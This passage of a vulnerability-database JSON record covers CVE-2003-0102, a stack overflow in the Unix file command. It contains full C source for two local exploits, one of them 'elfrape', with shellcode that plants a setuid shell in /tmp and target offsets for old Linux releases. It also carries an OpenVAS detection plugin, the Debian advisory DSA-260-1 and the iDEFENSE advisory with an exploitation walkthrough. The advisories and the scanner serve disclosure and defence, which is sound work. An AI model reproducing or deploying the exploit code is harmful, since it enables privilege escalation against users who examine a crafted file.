\"BSD\" : \"LINUX\", code_len, argv[1]);\r\n memset (attackbuff, 0x90, FILESIZE);\r\n memset (attackbuff, 0x0, sizeof (Elf32_Ehdr));\r\n memcpy (attackbuff + FILESIZE - code_len, final_code, code_len);\r\n /* file requires the following shit */\r\n ehdr->e_ident[0] = 0x7f; /* elf magic shit */\r\n ehdr->e_ident[1] = 'E';\r\n ehdr->e_ident[2] = 'L';\r\n ehdr->e_ident[3] = 'F';\r\n ehdr->e_ident[4] = 0x01;/* 32 bit objects */\r\n ehdr->e_ident[5] = 0x01;/* LSB */\r\n ehdr->e_type = ET_EXEC;/* if you wanna know, go google it */\r\n ehdr->e_machine = EM_VPP500;\r\n ehdr->e_version = EV_CURRENT;\r\n ehdr->e_shoff = sizeof (Elf32_Ehdr);\r\n ehdr->e_ehsize = sizeof (Elf32_Ehdr);\r\n ehdr->e_shentsize = 2048;\r\n ehdr->e_shnum = 0x0001;\r\n for (ix = 0; ix < 256; ix += 4)\r\n {\r\n *(long *) (attackbuff + ehdr->e_ehsize + ix) = get_sp () - 1500;\r\n }\r\n if ((fd = open (argv[1], O_WRONLY | O_CREAT | O_TRUNC)) < 0)\r\n {\r\n perror (\"open()\");\r\n exit (-1);\r\n }\r\n if (write (fd, attackbuff, FILESIZE) == -1)\r\n {\r\n perror (\"write()\");\r\n exit (-1);\r\n }\r\n close (fd);\r\n free (shell);\r\n free (final_code);\r\n fprintf (stderr,\r\n \"Use /tmp/.sh to gain the targets uid once they run 'file %s'\\n\",\r\n argv[1]);\r\n fprintf (stderr, \"Make sure the shell you copied doesn't drop privs\\n\");\r\n return 0;\r\n}\r\n/* this func allows for the shellcode to echo out legit results for file */\r\nunsigned char *\r\nprepare_code (unsigned char *os_code, unsigned char *filename,\r\n unsigned char *shell, int *len)\r\n{\r\n unsigned char *complete;\r\n *len = strlen (os_code);\r\n *len += strlen (cmd);\r\n *len += strlen (filename) - 2;\r\n *len += strlen (shell) - 2;\r\n if (!(complete = (char *) malloc (*len)))\r\n {\r\n fprintf (stderr, \"malloc error\\n\");\r\n exit (-1);\r\n }\r\n memcpy (complete, os_code, strlen (os_code));\r\n sprintf (complete + strlen (os_code), cmd, filename, shell, shell, shell,\r\n shell);\r\n return complete;\r\n}\r\n", "cvss": {"score": 
4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22325/"}, {"lastseen": "2016-02-02T18:29:07", "bulletinFamily": "exploit", "description": "File 3.x Local Stack Overflow Code Execution Vulnerability (1). CVE-2003-0102. Local exploit for unix platform", "modified": "2003-03-04T00:00:00", "published": "2003-03-04T00:00:00", "id": "EDB-ID:22324", "href": "https://www.exploit-db.com/exploits/22324/", "type": "exploitdb", "title": "File 3.x - Local Stack Overflow Code Execution Vulnerability 1", "sourceData": "source: http://www.securityfocus.com/bid/7008/info\r\n\r\nIt has been reported that a stack overflow exists in the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to execute code as the user invoking file. \r\n\r\n/*\r\n** elfrape BY lem0n (lem0nxx@hotmail.com)\r\n** a glorified stack overflow in file<=3.39 \r\n**\r\n** \"lame code for a lame bug\"\r\n**\r\n** this bug was discovered by iDEFENSE retards\r\n** (actually i discovered it and they bought it from \r\n** me for $8, all that it is really worth)\r\n**\r\n** this code is mainly proof of concept and it has very little use\r\n** \"in the wild\" unless your sysadmins and friends are morons.\r\n**\r\n** specify a valid elf binary, and elfrape will patch it so that\r\n** it will exploit a stack overflow in file<=3.39. this exploit\r\n** relies on the victim user (possibly root, but not required) to\r\n** run file <patchedbinary>.\r\n**\r\n** a glorified stack overflow in file<=3.39\r\n** \r\n** file-3.37/readelf.c:tryelf()\r\n** doshn(class, swap,\r\n** fd,\r\n** getu32(swap, elfhdr.e_shoff),\r\n** getu16(swap, elfhdr.e_shnum),\r\n** getu16(swap, elfhdr.e_shentsize));\r\n**\r\n** note that we can manipulate elfhdr. 
\r\n** in doshn() we find a very bad thing...\r\n**\r\n** file-3.37/readelf.c:doshn()\r\n** if (read(fd, sh_addr, size) == -1)\r\n**\r\n** now, fd is the file its processing, sh_addr is the address of a 32 byte char. \r\n** size is the value read from the header (elfhdr.e_shentsize). So we make \r\n** e_shentsize bigger then it should and voila, we got eip pretty easily. \r\n** the shellcode cant easily be placed after the address however because file is very \r\n** sensitive about its fd and the loop variable num being overwritten (it will either\r\n** complain about bad fd and exit or hang in the loop). trying to preserve the values of\r\n** each seemed stupid, so i found the best spot for\r\n** the shellcode placement was in the beginning of the file, after the elf header\r\n** because in the beginning of processing, file reads HOWMANY bytes from the start of the\r\n** file onto the stack.\r\n** \r\n** #define HOWMANY 16384\r\n**\r\n** that makes for a pretty large landing pad, pop a few thousand nops in there\r\n** and this should be a pretty reliable method.\r\n**\r\n** the shellcode also makes sure to output a seemingly genuine result, which will\r\n** always be filename: data\r\n**\r\n** (16:11)[lem0n@keystone:~/audit/file]$cp /bin/sln sln\r\n** (16:11)[lem0n@keystone:~/audit/file]$./elfrape -t 0 -f sln\r\n** elfrape file<=3.39 priveledge escalation exploit (by lem0n (lem0nxx@hotmail.com)\r\n** [patching sln, trying to hit 0xbfffbab0]\r\n** [setting section header size to trigger overwrite (0x32 bytes)]\r\n** [setting section header entries to 1 to avoid a big mess on the stack]\r\n** [writing new header to file]\r\n** [writing target address to file @offset 0x5f4f0]\r\n** [filling file with nops and shell code @offset 0x34]\r\n** [exploit done]\r\n** after someone runs 'file sln', execute /tmp/.sh\r\n** (16:11)[lem0n@keystone:~/audit/file]$cp sln /tmp/whatami\r\n** (16:11)[lem0n@keystone:~/audit/file]$echo and now we wait...\r\n**\r\n** typical sp offsets 
for -o mode are from -2000 to -6000 \r\n** \r\n** Will create a 6755 /bin/.sh :>\r\n** \r\n** Note: may not work if used on files less than 8k or so.\r\n*/\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n#include <sys/types.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#define MAX_FILENAME 17/* the longest filename i suggest you use */\r\n#define SHELL \"/bin/ash\"/* a shell that doesnt do seteuid(getuid()); ash,ksh,zsh,etc */\r\n#define LANDING_SIZE 8192/* pretty big considering its just nops and shellcode */\r\n/* shellcode shamelessly stolen (from ?) and modified */\r\nchar shellcode[] =\r\n \"\\x31\\xc0\\x31\\xdb\\x31\"\r\n \"\\xd2\"\r\n \"\\x68\" \"\\x00\\x00\\x00\\x00\"\r\n \"\\x68\" \"\\x00\\x00\\x00\\x00\"\r\n \"\\x68\" \"\\x00\\x00\\x00\\x00\"\r\n \"\\x68\" \"\\x00\\x00\\x00\\x00\"\r\n \"\\x68\" \"\\x00\\x00\\x00\\x00\"\r\n \"\\x68\" \"\\x00\\x00\\x00\\x00\"\r\n \"\\x68\" \"\\x00\\x00\\x00\\x00\"\r\n \"\\x89\\xe1\\xb2\\x20\\x43\\xb0\\x04\\xcd\\x80\\x31\\xc0\"\r\n \"\\xeb\\x31\\x5e\\x89\\x76\\xac\\x8d\\x5e\\x08\\x89\\x5e\\xb0\"\r\n \"\\x8d\\x5e\\x0b\\x89\\x5e\\xb4\\x31\\xc0\\x88\\x46\\x07\\x88\"\r\n \"\\x46\\x0a\\x88\\x46\\xab\\x89\\x46\\xb8\\xb0\\x0b\\x89\\xf3\"\r\n \"\\x8d\\x4e\\xac\\x8d\\x56\\xb8\\xcd\\x80\\x31\\xdb\\x89\\xd8\"\r\n \"\\x40\\xcd\\x80\\xe8\\xca\\xff\\xff\\xff/bin/sh -c \"\r\n \"/bin/cp \" SHELL \" /tmp/.sh;chmod 6755 /tmp/.sh\";\r\n#define EI_NIDENT 16\r\ntypedef unsigned short int Elf32_Half;\r\ntypedef unsigned long int Elf32_Word;\r\ntypedef unsigned long int Elf32_Addr;\r\ntypedef unsigned long int Elf32_Off;\r\ntypedef struct\r\n{\r\n unsigned char e_ident[EI_NIDENT];\r\n Elf32_Half e_type;\r\n Elf32_Half e_machine;\r\n Elf32_Word e_version;\r\n Elf32_Addr e_entry;\r\n Elf32_Off e_phoff;\r\n Elf32_Off e_shoff;\r\n Elf32_Word e_flags;\r\n Elf32_Half e_ehsize;\r\n Elf32_Half e_phentsize;\r\n Elf32_Half e_phnum;\r\n Elf32_Half e_shentsize;\r\n Elf32_Half e_shnum;\r\n Elf32_Half e_shtrndx;\r\n}\r\nElf32_Ehdr;\r\nstruct 
targets\r\n{\r\n int target;\r\n char *description;\r\n Elf32_Half e_shentsize;\r\n Elf32_Off e_shoff_delta;\r\n unsigned long int addr;\r\n};\r\nstruct targets targets[] = {\r\n {0, \"Slackware 8.1 (file-3.37-3.1)\", 50, 44, 0xbfffc19c},\r\n {1, \"Red Hat Linux release 7.2 (Enigma) (file-3.35)\", 80, 76, 0xbfffc19c},\r\n {2, \"Red Hat Linux release 6.2 (Zoot) (file-3.28)\", 50, 44, 0xbfffc19c},\r\n {0, NULL, 0, 0, 0}\r\n};\r\nextern char *optarg;\r\nextern int optind;\r\nvoid prepare_write_shellcode (char *program);\r\nunsigned long get_sp (void);\r\nvoid usage (char *argv0);\r\nunsigned long\r\nget_sp (void)\r\n{\r\n __asm__ (\"movl %esp,%eax\");\r\n}\r\nint\r\nmain (int argc, char *argv[])\r\n{\r\n int offset, fd, ix, nbytes, c, target = -1;\r\n unsigned char buff[sizeof (Elf32_Ehdr)];\r\n unsigned char attack[LANDING_SIZE];\r\n unsigned char *file = NULL;\r\n Elf32_Ehdr *ehdr;\r\n Elf32_Off e_shoff;\r\n Elf32_Half e_shnum;\r\n Elf32_Half e_shentsize = 50;\r\n Elf32_Off e_shoff_delta;\r\n unsigned long int addr = 1;\r\n while ((c = getopt (argc, argv, \"t:f:o:\")) != -1)\r\n {\r\n switch (c)\r\n{\r\ncase 't':\r\n target = atoi (optarg);\r\n break;\r\ncase 'f':\r\n file = (char *) strdup (optarg);\r\n break;\r\ncase 'o':\r\n addr = 0;\r\n offset = atoi (optarg);\r\n break;\r\ndefault:\r\n usage (argv[0]);\r\n break;\r\n}\r\n }\r\n printf\r\n (\"elfrape file<=3.39 priveledge escalation exploit (by lem0n (lem0nxx@hotmail.com)\\n\");\r\n if (!(file) || ((target == -1) && (addr)))\r\n usage (argv[0]);\r\n if (strchr(file,'/'))\r\n { printf(\"NO fucking slashes douchebag\\n\"); exit(-1); }\r\n \r\n if (strlen(file) > MAX_FILENAME)\r\n { printf(\"Smaller filename please, unless you feel like editing the shell code\\n\");exit(-1); }\r\n if (target >= 0)\r\n {\r\n if (target >= sizeof (targets) / sizeof (targets[0]) - 1)\r\n{\r\n fprintf (stderr, \"Invalid type\\n\");\r\n exit (-1);\r\n}\r\n e_shentsize = targets[target].e_shentsize;\r\n e_shoff_delta = 
targets[target].e_shoff_delta;\r\n addr = targets[target].addr;\r\n }\r\n if ((fd = open (file, O_RDWR)) < 0)\r\n {\r\n perror (\"open()\");\r\n exit (-1);\r\n }\r\n if ((nbytes = read (fd, (char *) buff, sizeof (Elf32_Ehdr))) == -1)\r\n {\r\n error (\"read failed (%s).\\n\", strerror (errno));\r\n exit (-1);\r\n }\r\n ehdr = (Elf32_Ehdr *) buff;\r\n if (addr == 0)\r\n addr = get_sp () - offset;/* we have a big enough landing point that this addr should work */\r\n printf (\" [patching %s, tring to hit 0x%x]\\n\", file, addr);\r\n printf\r\n (\" [setting section header size to trigger overwrite (0x%x bytes)]\\n\",\r\n e_shentsize);\r\n ehdr->e_shentsize = e_shentsize;\r\n printf\r\n (\" [setting section header entries to 1 to avoid a big mess on the stack]\\n\");\r\n ehdr->e_shnum = 1;\r\n/* write the new elf header to the file */\r\n printf (\" [writing new header to file]\\n\");\r\n if (lseek (fd, 0, SEEK_SET) == (off_t) - 1)\r\n {\r\n perror (\"lseek()\");\r\n exit (-1);\r\n }\r\n if (write (fd, buff, sizeof (*ehdr)) == -1)\r\n {\r\n perror (\"write()\");\r\n exit (-1);\r\n }\r\n/* seek to where we want our address to wait */\r\n printf (\" [writing target address to file @offset 0x%x]\\n\",\r\n ehdr->e_shoff + e_shoff_delta);\r\n if (lseek (fd, ehdr->e_shoff + e_shoff_delta, SEEK_SET) == (off_t) - 1)\r\n {\r\n perror (\"lseek()\");\r\n exit (-1);\r\n }\r\n write (fd, &addr, 4);\r\n memset (attack, 0x90, LANDING_SIZE);\r\n prepare_write_shellcode (file);\r\n memcpy (attack + LANDING_SIZE - sizeof (shellcode) - 1, shellcode,\r\n sizeof (shellcode));\r\n attack[LANDING_SIZE - 1] = 0x0;\r\n printf (\" [filling file with nops and shell code @offset 0x%x]\\n\",\r\n sizeof (*ehdr));\r\n/* set offset to just after the header, where our code will be */\r\n if (lseek (fd, sizeof (*ehdr), SEEK_SET) == (off_t) - 1)\r\n {\r\n perror (\"lseek()\");\r\n exit (-1);\r\n }\r\n if (write (fd, attack, LANDING_SIZE) == -1)\r\n {\r\n perror (\"write()\");\r\n exit (-1);\r\n }\r\n 
printf (\" [exploit done]\\n\");\r\n printf (\"after someone runs 'file %s', execute /tmp/.sh\\n\", file);\r\n close (fd);\r\n return 0;\r\n}\r\nvoid\r\nusage (char *argv0)\r\n{\r\n int ix = 0;\r\n printf (\"Usage: %s -t <target num> -f <existing elf binary filename>\\n\",\r\n argv0);\r\n printf\r\n (\" %s -o <offset from sp> -f <existing elf binary filename>\\n\\n\",\r\n argv0);\r\n while (targets[ix].target || ix == 0)\r\n {\r\n printf (\"\\t#%d: %s\\n\", targets[ix].target, targets[ix].description);\r\n ix++;\r\n }\r\n exit (-1);\r\n}\r\n/* a quick and dirty hack to let the shellcode have the correct filename */\r\nvoid\r\nprepare_write_shellcode (char *program)\r\n{\r\n char *buf;\r\n int ix;\r\n char *ptr = shellcode + 37;\r\n buf = (char *) malloc (strlen (program) + strlen (\": data\\n\"));\r\n memcpy (buf, program, strlen (program));\r\n memcpy (buf + strlen (program), \": data\\n\", 7);\r\n for (ix = 0; ix < strlen (buf); ix++)\r\n {\r\n if (ix && (ix % 4 == 0))\r\nptr -= 9;\r\n *ptr = buf[ix];\r\n ptr++;\r\n }\r\n free (buf);\r\n return;\r\n}\r\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22324/"}], "openvas": [{"lastseen": "2017-07-24T12:50:09", "bulletinFamily": "scanner", "description": "The remote host is missing an update to file\nannounced via advisory DSA 260-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53591", "id": "OPENVAS:53591", "title": "Debian Security Advisory DSA 260-1 (file)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_260_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 260-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"iDEFENSE discovered a buffer overflow vulnerability in the ELF format\nparsing of the 'file' command, one which can be used to execute\narbitrary code with the privileges of the user running the command. The\nvulnerability can be exploited by crafting a special ELF binary which is\nthen input to file. This could be accomplished by leaving the binary on\nthe file system and waiting for someone to use file to identify it, or\nby passing it to a service that uses file to classify input. (For\nexample, some printer filters run file to determine how to process input\ngoing to a printer.)\n\nFixed packages are available in version 3.28-1.potato.1 for Debian 2.2\n(potato) and version 3.37-3.1.woody.1 for Debian 3.0 (woody). 
We\nrecommend you upgrade your file package immediately.\";\ntag_summary = \"The remote host is missing an update to file\nannounced via advisory DSA 260-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20260-1\";\n\nif(description)\n{\n script_id(53591);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:28:10 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2003-0102\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 260-1 (file)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"file\", ver:\"3.28-1.potato.1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"file\", ver:\"3.37-3.1.woody.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:21:26", "bulletinFamily": "unix", "description": "- 
----------------------------------------------------------------------------\nDebian Security Advisory DSA-260-1 security@debian.org\nhttp://www.debian.org/security/ Michael Stone\nMarch 13, 2003 http://www.debian.org/security/faq\n- ----------------------------------------------------------------------------\n\nPackage: file\nVulnerability: buffer overflow\nDebian-specific: no\nCVE Id: CAN-2003-0102\n\niDEFENSE discovered a buffer overflow vulnerability in the ELF format\nparsing of the "file" command, one which can be used to execute\narbitrary code with the privileges of the user running the command. The\nvulnerability can be exploited by crafting a special ELF binary which is\nthen input to file. This could be accomplished by leaving the binary on\nthe file system and waiting for someone to use file to identify it, or\nby passing it to a service that uses file to classify input. (For\nexample, some printer filters run file to determine how to process input\ngoing to a printer.)\n\nFixed packages are available in version 3.28-1.potato.1 for Debian 2.2\n(potato) and version 3.37-3.1.woody.1 for Debian 3.0 (woody). 
We\nrecommend you upgrade your file package immediately.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nFor not yet released architectures please refer to the appropriate\ndirectory ftp://ftp.debian.org/debian/dists/sid/binary-$arch/ .\n\n\nDebian 2.2 (potato)\n- ----------------------\n\n Debian 2.2 (potato) was released for alpha, arm, i386, m68k, powerpc and sparc.\n\nDebian 3.0 (woody)\n- -------------------\n\n Debian 3.0 (woody) was released for alpha, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.\n\n- ----------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2003-03-13T00:00:00", "published": "2003-03-13T00:00:00", "id": "DEBIAN:DSA-260-1:4057C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00043.html", "title": "[SECURITY] [DSA-260-1] New file package fixes buffer overflow", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:07", "bulletinFamily": "software", "description": "iDEFENSE Security Advisory 03.04.03:\r\nhttp://www.idefense.com/advisory/03.04.03.txt\r\nLocally Exploitable Buffer 
Overflow in file(1)\r\nMarch 4, 2003\r\n\r\nI. BACKGROUND\r\n\r\nfile(1) is an application that utilizes a magic file (typically located in\r\n/usr/share/magic) to classify arbitrary files. The latest version of\r\nfile(1) is available for download from: ftp://ftp.astron.com/pub/file . \r\nFor example:\r\n\r\n $ file\r\n Usage: file [-bcnvzL] [-f namefile] [-m magicfiles] file...\r\n \r\n $ file unknown_file\r\n unknown_file: ASCII text\r\n\r\n\r\nII. DESCRIPTION\r\n\r\nThe file(1) command contains a buffer overflow vulnerability that can be\r\nleveraged by an attacker to execute arbitrary code under the privileges of\r\nanother user.\r\n\r\nThe crux of the problem lies in the following call to doshn() from\r\ntryelf() on line 587 in readelf.c:\r\n\r\n doshn(class, swap,\r\n fd,\r\n getu32(swap, elfhdr.e_shoff),\r\n getu16(swap, elfhdr.e_shnum),\r\n getu16(swap, elfhdr.e_shentsize));\r\n\r\nThe final argument to doshn() 'elfhdr.e_shentsize' is later used in a call\r\nto read() as can be seen here on line 133 in readelf.c:\r\n\r\n if (read(fd, sh_addr, size) == -1)\r\n\r\nThe call to read() will copy 'size' bytes into the variable 'sh_addr'\r\nwhich is defined on line 92 in readelf.c:\r\n\r\n #define sh_addr (class == ELFCLASS32 \\r\n ? (void *) &sh32 \\r\n : (void *) &sh64)\r\n\r\nThe storage buffer used in the call to read() is of size 0x20 (32) bytes,\r\nby supplying a 'size' of 0x28 (40) a stack overflow occurs overwriting the\r\nstored frame pointer (EBP) and instruction pointer (EIP) thereby providing\r\nthe attacker with CPU control and the ability to execute arbitrary code.\r\n\r\nIII. ANALYSIS\r\n\r\nA user who can successfully convince another user to examine a specially\r\nconstructed exploit file with the file(1) command can execute arbitrary\r\ncode under the privileges of that user.\r\n\r\nThe following is a sample walkthrough of a successful exploitation. 
The\r\nattacker must initially generate a file that is specially structured to\r\ntrigger a buffer overflow in the file(1) command:\r\n\r\n $ ./mkfile_expl -C /tmp/suid -F /tmp/exploit -O "ASCII text" -R\r\n/bin/bash -p 1\r\n\r\n Local /usr/bin/file upto v3.39 exploit by anonymous\r\n \r\n Using PRESET: 1 [Linux file <= 3.38 ]\r\n \r\n Using FILENAME: /tmp/exploit\r\n Using REAL_SHELL: /bin/bash\r\n Using CREATED_SHELL: /tmp/suid\r\n Using OUTPUT: ASCII text\r\n \r\n Using RET_ADDR: 0xbfffc3f0\r\n Using NOP_COUNT: 6000\r\n \r\n Exploit created -> /tmp/exploit\r\n Time to wait till somebody starts /usr/bin/file /tmp/exploit\r\n\r\nOnce the tainted file has been generated the attacker must wait for or\r\ncoerce another user to examine the file with the file(1) command.\r\n\r\n # ls -l exploit\r\n -rwxr-xr-x 1 farmer farmer 6406 Jan 11 22:07 exploit\r\n \r\n # file exploit\r\n /tmp/exploit: ASCII text\r\n\r\nThe file(1) command reports that the examined file is "ASCII text" as the\r\nattacker specified in the creation of the exploit file. At this point if\r\nthe attack was a success the original attack file (exploit) has been\r\nerased and a set user id shell has been created:\r\n\r\n # ls -l exploit\r\n ls: exploit: No such file or directory\r\n \r\n $ ls -l suid\r\n -rwsr-sr-x 1 root root 541096 Jan 11 22:07 suid\r\n\r\nIV. DETECTION\r\n\r\niDEFENSE has successfully exploited file(1) versions 3.37 and 3.39. It is\r\nsuspected that all versions up to and including 3.39 are vulnerable.\r\n\r\nV. VENDOR FIX/RESPONSE\r\n\r\nThe latest version of file(1) fixes this issue and is available from\r\nftp://ftp.astron.com/pub/file/file-3.41.tar.gz . Specific vendors will be\r\nshipping updated packages in the near future.\r\n\r\nVI. CVE INFORMATION\r\n\r\nThe Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has\r\nassigned the identification number CAN-2003-0102 to this issue.\r\n\r\nVII. 
DISCLOSURE TIMELINE\r\n\r\n12/16/2002 Issue disclosed to iDEFENSE\r\n02/24/2003 Maintainers notified: mail_contact@darwinsys.com\r\n02/24/2003 Response from Ian Darwin, ian@darwinsys.com\r\n02/25/2003 Response received from christos@zoulas.com\r\n02/25/2003 iDEFENSE clients notified\r\n02/27/2003 OS vendors notified via vendor-sec@lst.de\r\n03/04/2003 Public Disclosure\r\n\r\nVIII. CREDIT\r\n\r\nAn anonymous researcher discovered this vulnerability.\r\n\r\n\r\nGet paid for security research\r\nhttp://www.idefense.com/contributor.html\r\n\r\nSubscribe to iDEFENSE Advisories:\r\nsend email to listserv@idefense.com, subject line: "subscribe"\r\n\r\n\r\nAbout iDEFENSE:\r\n\r\niDEFENSE is a global security intelligence company that proactively\r\nmonitors sources throughout the world \u2014 from technical\r\nvulnerabilities and hacker profiling to the global spread of viruses\r\nand other malicious code. Our security intelligence services provide \r\ndecision-makers, frontline security professionals and network \r\nadministrators with timely access to actionable intelligence\r\nand decision support on cyber-related threats. For more information,\r\nvisit http://www.idefense.com .\r\n", "modified": "2003-03-05T00:00:00", "published": "2003-03-05T00:00:00", "id": "SECURITYVULNS:DOC:4165", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4165", "title": "iDEFENSE Security Advisory 03.04.03: Locally Exploitable Buffer Overflow in file(1)", "type": "securityvulns", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}